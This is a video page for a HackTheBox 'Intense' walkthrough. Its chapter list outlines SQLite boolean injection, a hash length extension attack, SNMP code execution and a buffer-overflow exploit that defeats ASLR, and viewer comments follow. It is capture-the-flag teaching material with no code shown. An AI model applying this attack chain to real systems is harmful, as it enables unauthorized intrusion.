HackTheBox - Intense

Подписаться 241 тыс.

Просмотров 34 тыс.

50% 1

00:00 - Intro
01:15 - Begin of nmap
03:30 - Examining the Message, pointing out the endpoint does not need authentication
06:15 - Using FFUF to fuzz the API End Point and show importence of Content-Type
12:00 - Starting SQLMAP then manually fuzzing this application
14:30 - SQLite Boolean Injection, with CASE IF/THEN/ERROR
20:00 - SQLite Boolean Injection, Enumerating Usernames
24:00 - SQLite Boolean Injection, Start of Dumping Password
26:10 - SQLite Boolean Injeciton, Optimization chat about UNICODE and SUBSTR
29:40 - Start of coding out python script to dump the hash
41:20 - This hash looks weird... Tons of troubleshooting
45:12 - Explaining the issue, we are hitting the 140 character limit... Switching script up to do SUBSTR
51:55 - Script completed to dump hashes.
53:15 - Static source code analysis, find its vulnerable to Hash Length Extension Attack
59:50 - Using HashPumpy to perform the Hash Length Extension Attack
1:11:30 - We base64'd the signing portion wrong
1:13:30 - Now we have access to /admin, can use its API to read files and directories, showing Sched_debug and /proc/net/tcp,udp,environ to get important information
1:23:30 - Finding a RW SNMP Community string and then using snmp-shell to get code execution
1:29:00 - Generating a SSH Key then copying it slowly to the box
1:35:00 - Doing a Local Port Forward with the Debian-SNMP User
1:37:20 - Binary Exploitation with Note_Server: Going over Source and recompiling with ggdb flag
1:41:00 - Binary Exploitation: Setting up PwnTools so we can interact with the binary
1:46:40 - Binary Exploitation: Defeating ASLR by leaking an address
1:56:20 - Binary Exploitation: Leaking LibC and Getting Code Execution
2:05:30 - Binary Exploitation: Creating offset's for our remote server to get it working

Опубликовано:

3 июл 2024

Ссылка:

Скачать:

Готовим ссылку...

Добавить в:

Мой плейлист

Посмотреть позже

Комментарии : 52

@XArticSpartanX 3 года назад

Awesome vid that buffer overflow working on first run was sick

@Ms.Robot. 3 года назад

Your stroll to the snmp string and rush of the Buffer overflow was very Charming and well explained. Loved it. 💝💝💝😍

@sreyanchakravarty7694 3 года назад

Never a dull moment with Ippsec. Thank you so much for your videos.

@spent1276 3 года назад

IppSec drinking game: Every time he says "Let's see..." take a drink.

@FuzzFuck 3 года назад

or every time an add plays, take a drink

@noway5930 3 года назад

‘if EXPR: return True;else: return False;’ this is same as ‘return EXPR’. Great vid :D

@moblemeh152 3 года назад

Great video as always thanks for the hard work !

@azelbane87 3 года назад

Absolutely AWESOME!! IppSec, WE Absolutely LOVE YOU & ur VIDEOS!!!👏👏👏✊👋

@haniagel3896 3 года назад

oh ippsec is here this is going to be a great weekend 😍😍

@ASoggySandal 3 года назад

This was a great video and box!

@Seferan 3 года назад

5:36 - The difference when you're authenticated vs not authenticated is the menu option for Submit. Its exactly what you said previously, that the "Auth" only givens you the link/menu option.

@Xblade45 3 года назад

Great video, very enjoyable :) Also, JSON requires double quotes -> " :)

@ChrisSoehnlein 3 года назад

Awesome video! Started losing my way around the Buffer Overflow section. Would love a video explaining Buffer Overflows from your mindset and the tools you use. I've been learning via Immunity Debugger but still struggling which really halted my progress on this box when it was active.

@loganmay2105 3 года назад

This was probably my favorite box, sad they retired it Edit: 1:46:41 there is no ASLR on this binary Edit 2: I want to point out you can run GDB commands through pwntools and automate all that manual work

@cybersecurity3523 3 года назад

Welcome back pro

@goebbelsx 3 года назад

Can you make one video about 1 day exploit development? or how identify already patched vulnerability. There are few resources but there aren't many and I struggle to find solid learning resource. I am sure you have some experience in it :)

@-zer122 3 года назад

Great video, as always ! The exploitation part was a bit too fast, but maybe you have been planning on extra videos for showing more binary exploitation (entry level) Ffuf is kinda cool but not a finish tool as gobuster or wfuzz are. They made ffuf complex with 'filter' instead of 'hide' as in wfuzz, and moreover the export format don't have TXT. And if you set the -recurse options (dirb like) the output is trash for all over the website targeted

@exag0ra 3 года назад

@- ZER Totally agreed on FFUF. I used to use it, but I much prefer wfuzz or gobuster to it. Have you tried FeroxBuster (github.com/epi052/feroxbuster)? I just started using that within the past 2 weeks or so and it's a really cool tool written in Rust. It's very fast compared to gobuster, FFUF, and Dirsearch, plus it does recursion by default extremely well.

@JoseGonzalezDynamEq Год назад

Respect😅👍

@j4ck_d4niels 3 года назад

Intense really hard box, am stuck at enumeration point and I got lazy to step back and think again

@jaybachre6976 3 года назад

What do the different values of levels and risks mean in sqlmap?

@michaelbann3485 3 года назад

Fun fact -- print in python3 takes an argument "flush" which does exactly the janky print/flush stuff you're doing but in a single kwarg. i.e.: print("Something", flush=True).

@Buiscit1738 3 года назад

most underrated comment.

@3zehnutters 3 года назад

If you want to do flush printing in python3 without sys, then try the following syntax: print(f"promt: {acc}", end=' ')

@DHIRAL2908 3 года назад

48:25 I just did it like %pw[:-5]% so it only checks the last 5 found chars with the forward one...

@amirkiani2253 3 года назад

Good Bro

@shaikjilani8242 3 года назад

EXCELLENT BRO❤️❤️❤️❤️ LOVE FROM INDIA

@wchen2340 3 года назад

i can barely understand half of the stuff he does. but its awesome

@hassanabdul-kareem2287 3 года назад

still at the scripting part you should have used binary tree to optimize it further and minimize the the amount of requests you need X > 100 = True x = 200 = False x = 200+100/2 -> x = 150 = false x = 100+150/2 -> x=125 = false ... until you achieve x is between 103/101 which is definitely 10 and so on. This would be super duper fast. I guess you didn't do it because that & what you would would do the same job and get it done :) This video energized me to do some SQL Injection labs, Thanks man.

@ippsec 3 года назад

I'm pretty sure I explained that and in showed extracting a single character as a unicode # to make that relatively easy... Just didn't show it because this is live coding and I don't do that nearly enough to write a decent algorithm or know what to google to get one done quickly. When doing PenTests (or videos), there's an art to deciding will doing this "the correct way" take more time than if I just do it quickly and get the result? It's a bad habit but I feel if you always go for the best it will be hard to get everything else you want done.

@hassanabdul-kareem2287 3 года назад

@@ippsec I totally agree on that point. Although I'd say that nobody would hate extra content, they can skip a part if they don't like it. In any case, I always watch your videos for the sole purpose of well built and demonstrated methodology.

@puppe1977 3 года назад

At 32:08, why not just 'return "OK" in r.text'?

@ristbs9057 3 года назад

how do you manage to know all this ??? you learned by yourself ?

@chrisrice8836 3 года назад

At the 45 min mark when trying to brute the hash and coming up against the character limit, couldn't you just take the second half of the hash and stick a % at the start? Like '%ddfd9 ) THEN...

@mehmetux4186 3 года назад

does anyone recommend me good book or tutorial or any source about reverse engineering and stack overflow attack binary exploitation?( like web application hacker handbook book )

@mehmetux4186 3 года назад

@@hassanabdul-kareem2287 thank you very much. it is what exactly i look for

@phyzix_phyzix 3 года назад

Burpsuite needs a dark mode

@xXThePr0Xx 3 года назад

Wouldn't Log Poisoning be an option to get a shell with logdir and logfile?

@ippsec 3 года назад

No. There’s no code execution how they are doing File Reads.

@xXThePr0Xx 3 года назад

@@ippsec oh yeah, nvm then

@youtubepremium5293 3 года назад

I m from india today is diwali bro happy_diwali ❤️💥💥❤️

@Seferan 3 года назад

Timestamp for 12:00 should read SQLMap, not NMap

@ippsec 3 года назад

Thank you fixed.

@glenrodrigues8149 3 года назад

I am new(noob)to this field can anyone tell me how to reach at this level

@TheGrimSniper14 3 года назад

Years of practice. When you’re getting into the nitty gritty especially with things like binary exploitation, it can require a lot of background knowledge so watching videos like this without knowing the background info is gonna be confusing because you don’t have the context of why he’s doing what he’s doing and how he got to some decisions